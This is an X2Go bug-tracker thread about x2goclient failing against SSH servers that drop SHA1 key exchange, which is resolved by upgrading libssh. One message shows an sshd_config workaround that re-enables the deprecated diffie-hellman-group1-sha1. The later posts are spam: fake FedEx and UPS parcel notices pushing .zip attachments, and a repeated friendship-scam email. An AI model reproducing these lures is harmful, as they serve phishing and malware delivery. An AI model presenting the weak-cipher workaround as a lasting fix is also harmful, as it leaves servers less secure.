X2Go Bug report logs - #472
Upgrade SSH key exchange and message authentication code from SHA1 to SHA2

version graph

Package: x2goclient; Maintainer for x2goclient is X2Go Developers <x2go-dev@lists.x2go.org>; Source for x2goclient is src:x2goclient.

Reported by: Aurélien Grosdidier <aurelien.grosdidier@gmail.com>

Date: Thu, 3 Apr 2014 14:35:02 UTC

Severity: important

Found in version 4.0.1.3-1

Reply or subscribe to this bug.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#472; Package x2goclient. (Thu, 03 Apr 2014 14:35:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Aurélien Grosdidier <aurelien.grosdidier@gmail.com>:
New Bug report received and forwarded. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Thu, 03 Apr 2014 14:35:02 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.x2go.org (full text, mbox):

From: Aurélien Grosdidier <aurelien.grosdidier@gmail.com>
To: submit@bugs.x2go.org
Subject: Upgrade SSH key exchange and message authentication code from SHA1 to SHA2
Date: Thu, 03 Apr 2014 16:29:54 +0200
[Message part 1 (text/plain, inline)]
Package: x2goclient
Version: 4.0.1.3-1

When establishing the connection to a server, x2goclient rely on
diffie-hellman-group1-sha1 and hmac-sha1 as key exchange algorithm and
message authentication code, respectively. Unfortunately, SHA1 can't be
considered that safe:

- https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html
- http://csrc.nist.gov/groups/ST/toolkit/secure_hashing.html

As a consequence, the connection of x2goclient to an hardened SSH server
(ie. not supporting SHA1) fails:

 kex error : did not find one of algos diffie-hellman-group1-sha1 in
list ...
 kex error : did not find one of algos hmac-sha1 in list ...

This problem could be solved:
- either by using SHA2 KexAlgorithms and MACs in x2goclient
- or by allowing users to choose between SHA1 or SHA2 hash functions

[signature.asc (application/pgp-signature, attachment)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Sat, 11 Oct 2014 11:30:01 GMT) Full text and rfc822 format available.

Acknowledgement sent to Alex DEKKER <bugs@ale.cx>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sat, 11 Oct 2014 11:30:02 GMT) Full text and rfc822 format available.

Message #10 received at 472@bugs.x2go.org (full text, mbox):

From: Alex DEKKER <bugs@ale.cx>
To: 472@bugs.x2go.org
Subject: Debian now has diffie-hellman-group1-sha1 disabled
Date: Sat, 11 Oct 2014 12:07:00 +0100
As of Version: 1:6.7p1-1 of openssh-server, it appears that Debian [and 
presumably upstream]'s sshd now has diffie-hellman-group1-sha1 disabled. 
This means that connections from x2goclient will fail.

I was able to work around this by adding:

KexAlgorithms 
curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

to /etc/ssh/sshd_config, but obviously at some point support for 
diffie-hellman-group1-sha1 is going to go away completely, rather than 
just being disabled by default.


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Sat, 11 Oct 2014 20:50:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sat, 11 Oct 2014 20:50:02 GMT) Full text and rfc822 format available.

Message #15 received at 472@bugs.x2go.org (full text, mbox):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: Alex DEKKER <bugs@ale.cx>, 472@bugs.x2go.org
Cc: o.schneyder@phoca-gmbh.de
Subject: Re: [X2Go-Dev] Bug#472: Debian now has diffie-hellman-group1-sha1 disabled
Date: Sat, 11 Oct 2014 20:48:01 +0000
[Message part 1 (text/plain, inline)]
Control: severity -1 important

HI Alex (DEKKER), hi Alex (Schneyder),

On  Sa 11 Okt 2014 13:07:00 CEST, Alex DEKKER wrote:

> As of Version: 1:6.7p1-1 of openssh-server, it appears that Debian  
> [and presumably upstream]'s sshd now has diffie-hellman-group1-sha1  
> disabled. This means that connections from x2goclient will fail.
>
> I was able to work around this by adding:
>
> KexAlgorithms  
> curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
>
> to /etc/ssh/sshd_config, but obviously at some point support for  
> diffie-hellman-group1-sha1 is going to go away completely, rather  
> than just being disabled by default.

Thanks for bringing this up. Did not realize so far.

@Alex Schneyder: do you think you can find a fix for this. This  
actually is a release blocker of 4.0.3.0... And it endangers the  
status of X2Go Client in Debian, as well.

Mike


-- 

DAS-NETZWERKTEAM
mike gabriel, herweg 7, 24357 fleckeby
fon: +49 (1520) 1976 148

GnuPG Key ID 0x25771B31
mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de

freeBusy:
https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
[Message part 2 (application/pgp-signature, inline)]

Severity set to 'important' from 'normal' Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to 472-submit@bugs.x2go.org. (Sat, 11 Oct 2014 20:50:02 GMT) Full text and rfc822 format available.

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Mon, 13 Oct 2014 13:55:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Oleksandr Shneyder <o.shneyder@phoca-gmbh.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 13 Oct 2014 13:55:02 GMT) Full text and rfc822 format available.

Message #22 received at 472@bugs.x2go.org (full text, mbox):

From: Oleksandr Shneyder <o.shneyder@phoca-gmbh.de>
To: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>, Alex DEKKER <bugs@ale.cx>, 472@bugs.x2go.org
Cc: o.schneyder@phoca-gmbh.de
Subject: Re: [X2Go-Dev] Bug#472: Debian now has diffie-hellman-group1-sha1 disabled
Date: Mon, 13 Oct 2014 15:34:16 +0200
[Message part 1 (text/plain, inline)]
And why is it a problem for X2Go? Is libssh not working any more? Then
it should be fixed in libssh, not in x2go?

Am 11.10.2014 22:48, schrieb Mike Gabriel:
> Control: severity -1 important
> 
> HI Alex (DEKKER), hi Alex (Schneyder),
> 
> On  Sa 11 Okt 2014 13:07:00 CEST, Alex DEKKER wrote:
> 
>> As of Version: 1:6.7p1-1 of openssh-server, it appears that Debian
>> [and presumably upstream]'s sshd now has diffie-hellman-group1-sha1
>> disabled. This means that connections from x2goclient will fail.
>>
>> I was able to work around this by adding:
>>
>> KexAlgorithms
>> curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
>>
>>
>> to /etc/ssh/sshd_config, but obviously at some point support for
>> diffie-hellman-group1-sha1 is going to go away completely, rather than
>> just being disabled by default.
> 
> Thanks for bringing this up. Did not realize so far.
> 
> @Alex Schneyder: do you think you can find a fix for this. This actually
> is a release blocker of 4.0.3.0... And it endangers the status of X2Go
> Client in Debian, as well.
> 
> Mike
> 
> 


-- 
-----------------------------------------------------------
Oleksandr Shneyder        | Email: o.shneyder@phoca-gmbh.de
phoca GmbH                | Tel. : 0911 - 14870374 0
Ludwig-Feuerbach-str. 18  | Fax. : 0911 - 14870374 9
D-90489 Nürnberg          | Mobil: 0163 - 49 64 461

Geschäftsführung:
Dipl.-Inf. Oleksandr Shneyder

Amtsgericht München | http://www.phoca-gmbh.de
HRB 196 658         | http://www.x2go.org
USt-IdNr.: DE281977973
-----------------------------------------------------------

[signature.asc (application/pgp-signature, attachment)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Mon, 13 Oct 2014 19:35:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael DePaulo <mikedep333@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 13 Oct 2014 19:35:02 GMT) Full text and rfc822 format available.

Message #27 received at 472@bugs.x2go.org (full text, mbox):

From: Michael DePaulo <mikedep333@gmail.com>
To: Oleksandr Shneyder <o.shneyder@phoca-gmbh.de>, 472@bugs.x2go.org
Cc: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>, Alex DEKKER <bugs@ale.cx>, o.schneyder@phoca-gmbh.de
Subject: Re: [X2Go-Dev] Bug#472: Bug#472: Debian now has diffie-hellman-group1-sha1 disabled
Date: Mon, 13 Oct 2014 15:33:15 -0400
On Mon, Oct 13, 2014 at 9:34 AM, Oleksandr Shneyder
<o.shneyder@phoca-gmbh.de> wrote:
> And why is it a problem for X2Go? Is libssh not working any more? Then
> it should be fixed in libssh, not in x2go?
>
> Am 11.10.2014 22:48, schrieb Mike Gabriel:
>> Control: severity -1 important
>>
>> HI Alex (DEKKER), hi Alex (Schneyder),
>>
>> On  Sa 11 Okt 2014 13:07:00 CEST, Alex DEKKER wrote:
>>
>>> As of Version: 1:6.7p1-1 of openssh-server, it appears that Debian
>>> [and presumably upstream]'s sshd now has diffie-hellman-group1-sha1
>>> disabled. This means that connections from x2goclient will fail.
>>>
>>> I was able to work around this by adding:
>>>
>>> KexAlgorithms
>>> curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
>>>
>>>
>>> to /etc/ssh/sshd_config, but obviously at some point support for
>>> diffie-hellman-group1-sha1 is going to go away completely, rather than
>>> just being disabled by default.
>>
>> Thanks for bringing this up. Did not realize so far.
>>
>> @Alex Schneyder: do you think you can find a fix for this. This actually
>> is a release blocker of 4.0.3.0... And it endangers the status of X2Go
>> Client in Debian, as well.
>>
>> Mike
[...]

Looking through the libssh git logs, it appears that libssh 0.6 was
the first version to add support for a non-sha1 key exchange method,
ecdh_sha2_nistp256 [1].

0.6 also added support for curve25519-sha256@libssh.org [1].

In a few hours or so, I will test if using a libssh 0.6.x linked
version of x2goclient fixes this bug.

Jessie does include libssh 0.6.3 (Thanks to our DD, Mike#1)[2].

-Mike#2

[1] http://git.libssh.org/projects/libssh.git/log/?id=libssh-0.6.0&qt=grep&q=sha2
[2] https://packages.debian.org/jessie/libssh-4


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Mon, 13 Oct 2014 23:25:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael DePaulo <mikedep333@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 13 Oct 2014 23:25:02 GMT) Full text and rfc822 format available.

Message #32 received at 472@bugs.x2go.org (full text, mbox):

From: Michael DePaulo <mikedep333@gmail.com>
To: Oleksandr Shneyder <o.shneyder@phoca-gmbh.de>, 472@bugs.x2go.org, Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
Cc: o.schneyder@phoca-gmbh.de, Alex DEKKER <bugs@ale.cx>
Subject: Re: [X2Go-Dev] Bug#472: Bug#472: Bug#472: Debian now has diffie-hellman-group1-sha1 disabled
Date: Mon, 13 Oct 2014 19:22:11 -0400
On Mon, Oct 13, 2014 at 3:33 PM, Michael DePaulo <mikedep333@gmail.com> wrote:
> [...]
>
> Looking through the libssh git logs, it appears that libssh 0.6 was
> the first version to add support for a non-sha1 key exchange method,
> ecdh_sha2_nistp256 [1].
>
> 0.6 also added support for curve25519-sha256@libssh.org [1].
>
> In a few hours or so, I will test if using a libssh 0.6.x linked
> version of x2goclient fixes this bug.
>
> Jessie does include libssh 0.6.3 (Thanks to our DD, Mike#1)[2].
>
> -Mike#2
>
> [1] http://git.libssh.org/projects/libssh.git/log/?id=libssh-0.6.0&qt=grep&q=sha2
> [2] https://packages.debian.org/jessie/libssh-4

The bad news:
I can confirm that X2Go Client for Windows 4.0.2.1+hotfix+build6 (and
all prior versions/builds) ARE AFFECTED by this bug and ARE UNABLE to
connect to a Debian Jessie server with openssh-server 6.7p1-2 (from
sid) installed. Said version of X2go Client for Windows bundles and
uses libssh 0.5.5.

The good news:
I can confirm that X2Go Client for Windows 4.0.3.0 nightly builds
(mingw 4.8 tested) ARE NOT AFFECTED by this bug and ARE ABLE to
connect to a Debian Jessie server with openssh-server 6.7p1-2 (from
sid) installed. Said version of X2Go Client bundles and uses libssh
0.6.3.

See bug #590 for the details on X2Go Client for Windows having libssh
upgraded to 0.6.x during 4.0.3.0's development cycle.

-Mike#2


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Mon, 13 Oct 2014 23:35:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael DePaulo <mikedep333@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 13 Oct 2014 23:35:02 GMT) Full text and rfc822 format available.

Message #37 received at 472@bugs.x2go.org (full text, mbox):

From: Michael DePaulo <mikedep333@gmail.com>
To: 472@bugs.x2go.org
Subject: Screenshot of the "Can not connect to" error
Date: Mon, 13 Oct 2014 19:33:47 -0400
Screenshot of the "Can not connect to" error:
http://imgur.com/rpLs1OZ


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Tue, 14 Oct 2014 02:50:01 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael DePaulo <mikedep333@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Tue, 14 Oct 2014 02:50:02 GMT) Full text and rfc822 format available.

Message #42 received at 472@bugs.x2go.org (full text, mbox):

From: Michael DePaulo <mikedep333@gmail.com>
To: 472@bugs.x2go.org
Subject: Another Test
Date: Mon, 13 Oct 2014 22:47:40 -0400
On Mon, Oct 13, 2014 at 7:22 PM, Michael DePaulo <mikedep333@gmail.com> wrote
>>[..]
>
> The bad news:
> I can confirm that X2Go Client for Windows 4.0.2.1+hotfix+build6 (and
> all prior versions/builds) ARE AFFECTED by this bug and ARE UNABLE to
> connect to a Debian Jessie server with openssh-server 6.7p1-2 (from
> sid) installed. Said version of X2go Client for Windows bundles and
> uses libssh 0.5.5.
>
> The good news:
> I can confirm that X2Go Client for Windows 4.0.3.0 nightly builds
> (mingw 4.8 tested) ARE NOT AFFECTED by this bug and ARE ABLE to
> connect to a Debian Jessie server with openssh-server 6.7p1-2 (from
> sid) installed. Said version of X2Go Client bundles and uses libssh
> 0.6.3.
>
> [...]
>
> -Mike#2

X2Go Client (binary package: x2goclient) 4.0.2.1-1 as it exists in
Debian Jessie right now IS NOT AFFECTED. It IS ABLE to connect the
aforementioned server. It is using Debian Jessie's libssh (binary
package: libssh-4) 0.6.3-3+b1.

Note that when you connect and perform the key exchange,
~/.ssh/known_hosts (Windows: %USERPROFILE%/ssh/known_hosts) will have
a line like the following added:
192.168.1.37 ecdsa-sha2-nistp256 <host-id>
Whereas for the old key exchange, a line like this would be added:
192.168.1.37 ssh-rsa <host-id>

-Mike#2


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Fri, 17 Oct 2014 08:40:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 17 Oct 2014 08:40:02 GMT) Full text and rfc822 format available.

Message #47 received at 472@bugs.x2go.org (full text, mbox):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: Michael DePaulo <mikedep333@gmail.com>
Cc: Oleksandr Shneyder <o.shneyder@phoca-gmbh.de>, 472@bugs.x2go.org, Alex DEKKER <bugs@ale.cx>, o.schneyder@phoca-gmbh.de
Subject: Re: [X2Go-Dev] Bug#472: Bug#472: Debian now has diffie-hellman-group1-sha1 disabled
Date: Fri, 17 Oct 2014 08:37:41 +0000
[Message part 1 (text/plain, inline)]
Hi Alex, hi Mike#2,

On  Mo 13 Okt 2014 21:33:15 CEST, Michael DePaulo wrote:

> On Mon, Oct 13, 2014 at 9:34 AM, Oleksandr Shneyder
> <o.shneyder@phoca-gmbh.de> wrote:
>> And why is it a problem for X2Go? Is libssh not working any more? Then
>> it should be fixed in libssh, not in x2go?
>>
>> Am 11.10.2014 22:48, schrieb Mike Gabriel:
>>> Control: severity -1 important
>>>
>>> HI Alex (DEKKER), hi Alex (Schneyder),
>>>
>>> On  Sa 11 Okt 2014 13:07:00 CEST, Alex DEKKER wrote:
>>>
>>>> As of Version: 1:6.7p1-1 of openssh-server, it appears that Debian
>>>> [and presumably upstream]'s sshd now has diffie-hellman-group1-sha1
>>>> disabled. This means that connections from x2goclient will fail.
>>>>
>>>> I was able to work around this by adding:
>>>>
>>>> KexAlgorithms
>>>> curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
>>>>
>>>>
>>>> to /etc/ssh/sshd_config, but obviously at some point support for
>>>> diffie-hellman-group1-sha1 is going to go away completely, rather than
>>>> just being disabled by default.
>>>
>>> Thanks for bringing this up. Did not realize so far.
>>>
>>> @Alex Schneyder: do you think you can find a fix for this. This actually
>>> is a release blocker of 4.0.3.0... And it endangers the status of X2Go
>>> Client in Debian, as well.
>>>
>>> Mike
> [...]
>
> Looking through the libssh git logs, it appears that libssh 0.6 was
> the first version to add support for a non-sha1 key exchange method,
> ecdh_sha2_nistp256 [1].
>
> 0.6 also added support for curve25519-sha256@libssh.org [1].
>
> In a few hours or so, I will test if using a libssh 0.6.x linked
> version of x2goclient fixes this bug.
>
> Jessie does include libssh 0.6.3 (Thanks to our DD, Mike#1)[2].
>
> -Mike#2

The issue is a non-issue on distributions with libssh 0.6.x provided.

See yesterday's post of mine to x2go-user [1].

Mike

[1] http://permalink.gmane.org/gmane.linux.terminal-server.x2go.user/2368


-- 

DAS-NETZWERKTEAM
mike gabriel, herweg 7, 24357 fleckeby
fon: +49 (1520) 1976 148

GnuPG Key ID 0x25771B31
mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de

freeBusy:
https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
[Message part 2 (application/pgp-signature, inline)]

Information forwarded to x2go-dev@lists.x2go.org, banerian@uw.edu, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Wed, 26 Nov 2014 00:15:01 GMT) Full text and rfc822 format available.

Acknowledgement sent to root <root@ospgsql.radonc.washington.edu>:
Extra info received and forwarded to list. Copy sent to banerian@uw.edu, X2Go Developers <x2go-dev@lists.x2go.org>.

Your message did not contain a Subject field. They are recommended and useful because the title of a $gBug is determined using this field. Please remember to include a Subject field in your messages in future.

(Wed, 26 Nov 2014 00:15:01 GMT) Full text and rfc822 format available.


Message #52 received at 472@bugs.x2go.org (full text, mbox):

From: root <root@ospgsql.radonc.washington.edu>
To: 472@bugs.x2go.org
Date: Tue, 25 Nov 2014 15:51:59 -0800
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: stefani banerian <banerian@uw.edu>
X-Was-To: Debian Bug Tracking System <submit@bugs.debian.org>
To: <472@bugs.x2go.org>
Subject: x2goclient: bug #472 update
Bcc: stefani banerian <banerian@uw.edu>
X-Debbugs-Cc: banerian@uw.edu

Package: x2goclient
Version: 4.0.3.0-1
Severity: normal

Dear Maintainer,

In following the bug report #472:
http://bugs.x2go.org/db/47/472.html

the reported work-around at:
http://permalink.gmane.org/gmane.linux.terminal-server.x2go.user/2368
was employed. 

The following error was reported:

"The host key for this server was not found but an othertype of key exists. An attacker might change the default server key to confuse your client into thinking the key does not exist. 
For security reasons, it is recommended to stop the connection.
Do you want to terminate the connection? (no)
Host Key Verification Failed."

The warning did not reply which ssh host key was problematic, nor give an indication of the fingerprint for comparison.
The host keys did not in fact change. It is not clear why there would be a host key problem.


-- System Information:
Debian Release: jessie/sid
  APT prefers testing-updates
  APT policy: (500, 'testing-updates'), (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages x2goclient depends on:
ii  libc6           2.19-13
ii  libcups2        1.7.5-7
ii  libgcc1         1:4.9.1-19
ii  libldap-2.4-2   2.4.40-2
ii  libqt4-network  4:4.8.6+git64-g5dc8b2b+dfsg-2+b1
ii  libqt4-svg      4:4.8.6+git64-g5dc8b2b+dfsg-2+b1
ii  libqtcore4      4:4.8.6+git64-g5dc8b2b+dfsg-2+b1
ii  libqtgui4       4:4.8.6+git64-g5dc8b2b+dfsg-2+b1
ii  libssh-4        0.6.3-3+b1
ii  libstdc++6      4.9.1-19
ii  libx11-6        2:1.6.2-3
ii  libxpm4         1:3.5.11-1
ii  nxproxy         2:3.5.0.28-0x2go1+git20141113.546+wheezy.main.1
ii  openssh-client  1:6.7p1-3

Versions of packages x2goclient recommends:
ii  openssh-server  1:6.7p1-3
ii  rdesktop        1.8.2-3

Versions of packages x2goclient suggests:
pn  pinentry-x2go  <none>

-- no debconf information


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Thu, 06 Oct 2016 09:45:01 GMT) Full text and rfc822 format available.

Acknowledgement sent to "FedEx 2Day" <gene.kelley@studio-beam.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 06 Oct 2016 09:45:01 GMT) Full text and rfc822 format available.

Message #57 received at 472@bugs.x2go.org (full text, mbox):

From: "FedEx 2Day" <gene.kelley@studio-beam.com>
To: 472@bugs.x2go.org
Subject: Problem with parcel shipping, ID:0000816044
Date: Thu, 6 Oct 2016 09:39:42 +0000
[Message part 1 (text/plain, inline)]
Dear Customer,

We could not deliver your parcel.
You can review complete details of your order in the find attached.

Regards,
Gene Kelley,
Sr. Station Manager.

[Label_0000816044.zip (application/zip, attachment)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Sat, 04 Mar 2017 23:00:09 GMT) Full text and rfc822 format available.

Acknowledgement sent to <mkt50500@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sat, 04 Mar 2017 23:00:10 GMT) Full text and rfc822 format available.

Message #62 received at 472@bugs.x2go.org (full text, mbox):

From: "Agnes Andersson"<mgonzalez@munilosolivos.gob.pe>
Subject: Good Evening..
Date: Sat, 4 Mar 2017 22:49:15 -0000
Good Evening

This note might come as a surpprise to you. You might consider it an invassion of privacy and I hope you forgive me.I don't think you have a clue but my reason for writing you is to seek your friendship! I'm just being adventurous and that is why I'm using this letter as a resource, a tool to get your attention.

As a matter of fact, I've been wanting to try this a while now to chat, to ask you things, to comment on trivial matters or even to talk a bit about each other. But i've been clueless on how to go about it. Maybe you find it strange that I'm using something as cold as this means to reach you. But this is the best I can do for now.

In short: the purpose of this letter is just to ask you if you want to be my friend. And if you agree, just say yes and we can take it on from there.

I look forward to hear hearing from you.

Agnes Andersson.


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Sun, 05 Mar 2017 08:00:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to lancfamdds@lancasterfamilydentistry.com:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sun, 05 Mar 2017 08:00:02 GMT) Full text and rfc822 format available.

Message #67 received at 472@bugs.x2go.org (full text, mbox):

From: lancfamdds@lancasterfamilydentistry.com
To: 472@bugs.x2go.org
Subject: Delivery Notification, ID 05346614
Date: Sun, 5 Mar 2017 02:51:34 -0500
[Message part 1 (text/plain, inline)]
Dear Customer,

This is to confirm that your item has been shipped at March 03.

Please check delivery label attached!

With many thanks,
Dwight Proctor,
UPS Office Clerk.

[UPS-Receipt-05346614.zip (application/zip, attachment)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Sun, 05 Mar 2017 14:05:09 GMT) Full text and rfc822 format available.

Acknowledgement sent to <mkt50500@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sun, 05 Mar 2017 14:05:09 GMT) Full text and rfc822 format available.

Message #72 received at 472@bugs.x2go.org (full text, mbox):

From: "Agnes Andersson"<mgonzalez@munilosolivos.gob.pe>
Subject: Good Afternoon
Date: Sun, 5 Mar 2017 14:00:41 -0000
Good Afternoon 

This note might come as a surpprise to you. You might consider it an invassion of privacy and I hope you forgive me.I don't think you have a clue but my reason for writing you is to seek your friendship! I'm just being adventurous and that is why I'm using this letter as a resource, a tool to get your attention.

As a matter of fact, I've been wanting to try this a while now to chat, to ask you things, to comment on trivial matters or even to talk a bit about each other. But i've been clueless on how to go about it. Maybe you find it strange that I'm using something as cold as this means to reach you. But this is the best I can do for now.

In short: the purpose of this letter is just to ask you if you want to be my friend. And if you agree, just say yes and we can take it on from there.

I look forward to hear hearing from you.

Agnes Andersson.


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Tue, 28 Mar 2017 16:30:01 GMT) Full text and rfc822 format available.

Acknowledgement sent to web165@vierpixel01.hosting.de:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Tue, 28 Mar 2017 16:30:02 GMT) Full text and rfc822 format available.

Message #77 received at 472@bugs.x2go.org (full text, mbox):

From: web165@vierpixel01.hosting.de
To: 472@bugs.x2go.org
Subject: Package Delivery Notification
Date: Tue, 28 Mar 2017 18:21:36 +0200
[Message part 1 (text/plain, inline)]
Dear Customer,

Please review your parcel delivery label in the attachment!

FedEx

-----BEGIN PGP PUBLIC KEY BLOCK-----

tFt9nX54AF29b6FXV1c7z4KH/mGZQYZPGXNv9JBoKrujSpPdivqhPTmauNRW/KLgNdb37NO/Qiav
eASMh0aLp1whB28WcJ8h5FvwQakbz3hLX7wHpQgt0C90MhsVRcar3bEN86rb/pWvkykfKVNjU/Gg
1SKFLWtgCmy6Ny8+yiDq7TmximpWjVyD0/wPXpEOGWLqRR4x9dizXs2EDccy9G8sRgqBOD1Fn50I
udQZX7+jSOE5l/9xe3f2cVBc+q4QEQNaKvRJaHnU7aJTRMBS0W2+T7iVOkS3Rgr7Tuvyr+mGBTGl
OzN9leWPThTuJqjUriS9+Ee1D8rFsQm8tVPTRHwEZPgr66qLC4gAb9wE6aw6tocfDHpRRB6Y7iQQ
B7JJjqf5V6/AcxoFzlSziHdjhox9+7wkL3mbyYRbkfTKg44jcCVobZrRGE14m3j8Z3aqEw1wmFE8
KK9FhE/v+apyImD+NFg4JPQQiQKDbz7n3VwUXAHjQcUzdHx752pUV2mv2eAcxhXOKFMbAAJGNh8N
+rdOIhLOuvOz7W9gZz/H9vKY2259Zl0L+uml87nEzqSiHDYav3RUxOjPt/u4c+HUyN59Fb/hoT6j
ejp4E/QXvMDT4m8VKf4MvDDdVN3vK2dN8EQ/ygw8gwmkGQDKvkVvwAztPsyIn8/J7wJeqRNULdbO
slJCP5gfjJkL3SFm7VdCcwoZaIF+cov6QIF0854QRe5kQiz1+CL558+Y0nxfCGNeJlZ8OpPd7uca
AlgCFpyTj2xG10zoThyKhXDlj9eIpQPwExPXGJrZWPkJvKwO/kzRuleWonKG667C8XLqReJHdLK8
vUCaeKUhD+waUogFyjHs9DMmWBBaDUqxZ1nubx5W4uvknFepAoofMl4OO/QEBp+tr+158RAYj2bK
XYakEUrQry4dX7ALmVDEa+a/AJD5yaOPi73jtudW/G1YqUr0pTwFLPYm3F87don/ebydCvvLuXsX
23dTIR3AINUhfR1E/Wq61zNxIztc15FKR3y4iztbKnKYRK1f7bm7Qd4y0FZh8tmzW+XvUkue7Ptm
fj2USc7t2x+W9IVD8wLZ5l3mSY8NBdxIcl4vvzvrgPGmrLw+9/OirW/s1TTrsw4nOFAeI3r8cPJ8
ubB6DIF0zz4gTGdax13kxSn+GcbfB1lyz7e8IpRxVf6x+2VS+BIR1XfjejDLKpu44cuRRD/gcjaQ
OgY7YxsltyU5BjJ1D/HxyiqZ6i3kSI8iHoPp7xXx18T+hYAM1J7CyYBMbsq21OlThN7kqEME3Wpd
+dd86AMesv2jQFTrWhnWUkTRjlfLjHA1U7g16rwebg==


-----END PGP PUBLIC KEY BLOCK-----

[FedEx-Package-ID-5YXXQXYX.zip (application/zip, attachment)]

